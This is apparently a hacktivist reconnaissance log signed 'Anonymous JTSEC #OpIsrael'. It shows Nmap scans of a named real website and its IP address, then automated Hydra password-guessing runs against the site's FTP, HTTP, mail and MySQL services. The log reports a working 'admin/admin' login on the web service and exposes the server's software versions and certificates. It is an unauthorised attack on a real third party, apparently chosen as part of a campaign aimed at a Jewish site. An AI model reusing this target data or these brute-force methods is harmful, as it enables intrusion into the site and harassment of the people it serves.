Completed NSE at 20:19, 0.44s elapsed
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.14s latency).
Not shown: 428 filtered ports, 35 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        Pure-FTPd
| ssl-cert: Subject: commonName=finn.nocdirect.com
| Subject Alternative Name: DNS:finn.nocdirect.com, DNS:www.finn.nocdirect.com
| Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-10-24T00:00:00
| Not valid after:  2019-10-24T23:59:59
| MD5:   087b 6b54 a03e 5b2c 8b2c ca41 c757 1cd8
|_SHA-1: 8b54 69e6 8e16 7e30 de40 1e11 032b b4f2 cde0 821c
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http-proxy Squid http proxy
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: 403 Forbidden
110/tcp  open  pop3       Dovecot pop3d
|_pop3-capabilities: USER AUTH-RESP-CODE UIDL RESP-CODES SASL(PLAIN LOGIN) STLS CAPA TOP PIPELINING
|_ssl-date: TLS randomness does not represent time
143/tcp  open  imap       Dovecot imapd
|_imap-capabilities: AUTH=PLAIN more NAMESPACE STARTTLS Pre-login post-login AUTH=LOGINA0001 LOGIN-REFERRALS capabilities have ID IDLE SASL-IR LITERAL+ listed ENABLE IMAP4rev1 OK
|_ssl-date: TLS randomness does not represent time
443/tcp  open  ssl/ssl    Apache httpd (SSL-only mode)
|_http-server-header: Apache
|_http-title: 403 Forbidden
|_ssl-date: TLS randomness does not represent time
465/tcp  open  ssl/smtp   Exim smtpd 4.91
|_smtp-commands: finn.nocdirect.com Hello www.jewish.net [82.102.18.181], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, HELP,
| ssl-cert: Subject: commonName=jewish.net
| Subject Alternative Name: DNS:jewish.net, DNS:www.jewish.net
| Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-12-29T00:00:00
| Not valid after:  2018-03-29T23:59:59
| MD5:   aae4 706f baf2 1d7a b7f5 7ad4 7c26 6041
|_SHA-1: 91d9 5c27 3ced 329d 0274 e11e ec58 dc9a da56 0c21
|_ssl-date: TLS randomness does not represent time
587/tcp  open  smtp       Exim smtpd 4.91
| smtp-commands: finn.nocdirect.com Hello www.jewish.net [82.102.18.181], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
| ssl-cert: Subject: commonName=jewish.net
| Subject Alternative Name: DNS:jewish.net, DNS:www.jewish.net
| Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-12-29T00:00:00
| Not valid after:  2018-03-29T23:59:59
| MD5:   aae4 706f baf2 1d7a b7f5 7ad4 7c26 6041
|_SHA-1: 91d9 5c27 3ced 329d 0274 e11e ec58 dc9a da56 0c21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp  open  ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
3306/tcp open  mysql      MySQL 5.5.5-10.0.37-MariaDB
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.0.37-MariaDB
|   Thread ID: 7153714
|   Capabilities flags: 63487
|   Some Capabilities: ConnectWithDatabase, IgnoreSigpipes, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, Support41Auth, FoundRows, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, LongPassword, ODBCClient, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: XRri6mH]yj),@;H:*a+P
|_  Auth Plugin Name: 94
5666/tcp open  tcpwrapped
Device type: general purpose
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (92%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
Aggressive OS guesses: Linux 2.6.18 - 2.6.22 (92%), Linux 3.10 - 4.11 (86%), Linux 3.10 - 3.12 (86%), Linux 4.4 (86%), Linux 4.9 (85%), Linux 3.2 - 4.9 (85%), Linux 2.6.18 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 37.787 days (since Sat Oct  6 02:25:51 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: finn.nocdirect.com

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   121.45 ms 10.244.200.1
2   121.29 ms 69.73.184.159

NSE: Script Post-scanning.
Initiating NSE at 20:19
Completed NSE at 20:19, 0.00s elapsed
Initiating NSE at 20:19
Completed NSE at 20:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 278.73 seconds
           Raw packets sent: 974 (46.372KB) | Rcvd: 78 (3.944KB)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:19 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:19
Completed NSE at 20:19, 0.00s elapsed
Initiating NSE at 20:19
Completed NSE at 20:19, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 20:19
Completed Parallel DNS resolution of 1 host. at 20:19, 16.50s elapsed
Initiating UDP Scan at 20:19
Scanning www.jewish.net (69.73.184.159) [14 ports]
Completed UDP Scan at 20:19, 2.17s elapsed (14 total ports)
Initiating Service scan at 20:19
Scanning 11 services on www.jewish.net (69.73.184.159)
Service scan Timing: About 9.09% done; ETC: 20:37 (0:16:20 remaining)
Completed Service scan at 20:21, 102.58s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against www.jewish.net (69.73.184.159)
Retrying OS detection (try #2) against www.jewish.net (69.73.184.159)
Initiating Traceroute at 20:21
Completed Traceroute at 20:21, 7.20s elapsed
Initiating Parallel DNS resolution of 1 host. at 20:21
Completed Parallel DNS resolution of 1 host. at 20:21, 16.50s elapsed
NSE: Script scanning 69.73.184.159.
Initiating NSE at 20:21
Completed NSE at 20:21, 20.31s elapsed
Initiating NSE at 20:21
Completed NSE at 20:22, 1.02s elapsed
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.19s latency).

PORT     STATE         SERVICE      VERSION
53/udp   closed        domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
137/udp  filtered      netbios-ns
138/udp  filtered      netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
Too many fingerprints match this host to give specific OS details
Network Distance: 11 hops

TRACEROUTE (using port 137/udp)
HOP RTT       ADDRESS
1   ...
2   122.28 ms 10.244.200.1
3   ... 4
5   121.75 ms 10.244.200.1
6   126.76 ms 10.244.200.1
7   126.75 ms 10.244.200.1
8   126.72 ms 10.244.200.1
9   120.09 ms 10.244.200.1
10  120.00 ms 10.244.200.1
11  120.12 ms 10.244.200.1
12  ... 18
19  121.81 ms 10.244.200.1
20  121.32 ms 10.244.200.1
21  120.30 ms 10.244.200.1
22  ... 29
30  120.58 ms 10.244.200.1

NSE: Script Post-scanning.
Initiating NSE at 20:22
Completed NSE at 20:22, 0.00s elapsed
Initiating NSE at 20:22
Completed NSE at 20:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.78 seconds
           Raw packets sent: 123 (9.368KB) | Rcvd: 30 (3.796KB)
######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-12 20:22 EST
Nmap scan report for www.jewish.net (69.73.184.159)
Host is up (0.16s latency).
Not shown: 17 filtered ports, 4 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
110/tcp  open  pop3
993/tcp  open  imaps
3306/tcp open  mysql
#######################################################################################################################################
 + -- --=[Port 21 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-12 20:22:19
[DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
[DATA] attacking ftp://www.jewish.net:21/
[STATUS] 1.81 tries/min, 197 tries in 01:49h, 31 to do in 00:18h, 1 active
[STATUS] 1.84 tries/min, 202 tries in 01:50h, 26 to do in 00:15h, 1 active
[STATUS] 1.86 tries/min, 207 tries in 01:51h, 21 to do in 00:12h, 1 active
[STATUS] 1.89 tries/min, 212 tries in 01:52h, 16 to do in 00:09h, 1 active
[STATUS] 1.91 tries/min, 216 tries in 01:53h, 12 to do in 00:07h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-12 22:15:19
 + -- --=[Port 22 closed... skipping.
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 80 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-12 22:15:19
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking http-get://www.jewish.net:80//
[80][http-get] host: www.jewish.net   login: admin   password: admin
[STATUS] attack finished for www.jewish.net (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-12 22:15:21
 + -- --=[Port 110 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-12 22:15:21
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking pop3://www.jewish.net:110/
[STATUS] 6.00 tries/min, 6 tries in 00:01h, 1524 to do in 04:15h, 1 active
ctive
[STATUS] 3.62 tries/min, 1495 tries in 06:53h, 35 to do in 00:10h, 1 active
[STATUS] 3.62 tries/min, 1498 tries in 06:54h, 32 to do in 00:09h, 1 active
[STATUS] 3.62 tries/min, 1503 tries in 06:55h, 27 to do in 00:08h, 1 active
[STATUS] 3.62 tries/min, 1506 tries in 06:56h, 24 to do in 00:07h, 1 active
[STATUS] 3.62 tries/min, 1509 tries in 06:57h, 21 to do in 00:06h, 1 active
[STATUS] 3.62 tries/min, 1513 tries in 06:58h, 17 to do in 00:05h, 1 active
[STATUS] 3.62 tries/min, 1517 tries in 06:59h, 13 to do in 00:04h, 1 active
[STATUS] 3.62 tries/min, 1520 tries in 07:00h, 10 to do in 00:03h, 1 active
[STATUS] 3.62 tries/min, 1524 tries in 07:01h, 6 to do in 00:02h, 1 active
[STATUS] 3.62 tries/min, 1528 tries in 07:02h, 2 to do in 00:01h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-13 05:18:11
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 162 closed... skipping.
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 443 closed... skipping.
 + -- --=[Port 445 closed... skipping.
 + -- --=[Port 512 closed... skipping.
 + -- --=[Port 513 closed... skipping.
 + -- --=[Port 514 closed... skipping.
 + -- --=[Port 993 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-13 05:18:11
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking imaps://www.jewish.net:993/993
[STATUS] 4.00 tries/min, 4 tries in 00:01h, 1526 to do in 06:22h, 1 active
[STATUS] 3.26 tries/min, 1497 tries in 07:39h, 33 to do in 00:11h, 1 active
[STATUS] 3.26 tries/min, 1500 tries in 07:40h, 30 to do in 00:10h, 1 active
[STATUS] 3.26 tries/min, 1503 tries in 07:41h, 27 to do in 00:09h, 1 active
[STATUS] 3.26 tries/min, 1506 tries in 07:42h, 24 to do in 00:08h, 1 active
[STATUS] 3.26 tries/min, 1509 tries in 07:43h, 21 to do in 00:07h, 1 active
[STATUS] 3.26 tries/min, 1513 tries in 07:44h, 17 to do in 00:06h, 1 active
[STATUS] 3.26 tries/min, 1516 tries in 07:45h, 14 to do in 00:05h, 1 active
[STATUS] 3.26 tries/min, 1519 tries in 07:46h, 11 to do in 00:04h, 1 active
[STATUS] 3.26 tries/min, 1522 tries in 07:47h, 8 to do in 00:03h, 1 active
[STATUS] 3.26 tries/min, 1525 tries in 07:48h, 5 to do in 00:02h, 1 active
[STATUS] 3.26 tries/min, 1529 tries in 07:49h, 1 to do in 00:01h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-13 13:07:43
 + -- --=[Port 1433 closed... skipping.
 + -- --=[Port 1521 closed... skipping.
 + -- --=[Port 3306 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-13 13:07:43
[DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
[DATA] attacking mysql://www.jewish.net:3306/
[STATUS] 47.00 tries/min, 47 tries in 00:01h, 31 to do in 00:01h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-13 13:08:47
#######################################################################################################################################
                                           Anonymous JTSEC #OpIsrael  Full Recon #11